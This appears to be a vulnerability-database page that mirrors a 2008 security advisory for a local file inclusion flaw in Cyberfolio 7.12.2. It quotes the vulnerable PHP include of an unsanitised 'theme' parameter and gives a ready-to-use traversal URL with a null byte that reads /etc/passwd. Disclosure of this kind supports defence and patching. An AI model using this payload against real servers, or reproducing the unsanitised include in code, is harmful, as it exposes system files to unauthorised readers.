Lucene search

cyberfolio-lfi.txt

🗓️ 09 Nov 2008 00:00:00Reported by dunType

packetstorm🔗 packetstormsecurity.com👁 14 Views

Cyberfolio version 7.12.2 Local File Inclusion Vulnerabilit

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

` :::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ dun[at]strcpy.pl ]  
  
##################################################################  
# [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability #  
##################################################################  
#  
# Script site: http://cyberfolio.org/  
# Download: http://cyberfolio.org/Version-7-12-2  
#  
# Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00  
#   
# Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)  
#  
# ...  
# if (file_exists("./themes/".$_GET[theme].".php")) {  
# include_once("./themes/".$_GET[theme].".php"); // LFI  
# }  
# ...   
#  
#  
###############################################  
# Greetz: D3m0n_DE * str0ke * and otherz..  
###############################################  
  
[ dun / 2008 ]   
  
*******************************************************************************************  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

09 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4